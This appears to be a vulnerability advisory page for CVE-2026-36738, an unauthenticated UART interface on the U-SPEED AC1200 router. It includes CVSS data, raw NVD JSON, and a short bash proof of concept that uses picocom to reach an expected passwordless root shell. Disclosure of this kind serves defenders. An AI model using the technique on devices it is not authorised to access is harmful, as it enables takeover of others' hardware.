Security Vulnerability Report
CVE-2026-36738 CVSS 6.8 MEDIUM

CVE-2026-36738

Published: 2026-05-13 16:16:41
Last Modified: 2026-05-14 15:16:46

Description

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0 is vulnerable to Incorrect Access Control. The device exposes a UART interface that lacks authentication, authorization, or access control mechanisms. An attacker with physical access to the UART pins can connect to the interface and gain unrestricted access to device functionality.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-36738: UART Access on U-SPEED AC1200 Router
# Requirements: USB-to-TTL Serial Cable, picocom/minicom
#
# 1. Identify UART pins (TX, RX, GND) on the device PCB.
# 2. Connect USB-to-TTL cable: GND->GND, RX->TX, TX->RX.
# 3. Determine baud rate (commonly 115200 for IoT devices).

BAUD_RATE=115200
SERIAL_PORT="/dev/ttyUSB0"  # Adjust based on your OS

echo "[+] Connecting to UART interface at $BAUD_RATE baud..."

# Using picocom to connect (install via: apt-get install picocom)
picocom -b "$BAUD_RATE" "$SERIAL_PORT"

# Expected Result:
# A terminal shell should appear immediately without password prompt.
# Example output:
# U-Boot 1.1.3 (Jan 1 2026 - 00:00:00)
# ... (Boot messages) ...
# root@U-SPEED:/#

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36738", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:40.707", "lastModified": "2026-05-14T15:16:45.500", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0 is vulnerable to Incorrect Access Control. The device exposes a UART interface that lacks authentication, authorization, or access control mechanisms. An attacker with physical access to the UART pins can connect to the interface and gain unrestricted access to device functionality."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/N0tMilk/vulnerability-research", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738", "source": "[email protected]"}, {"url": "https://github.com/N0tMilk/vulnerability-research/tree/main/IoT/CVE-2026-36738", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}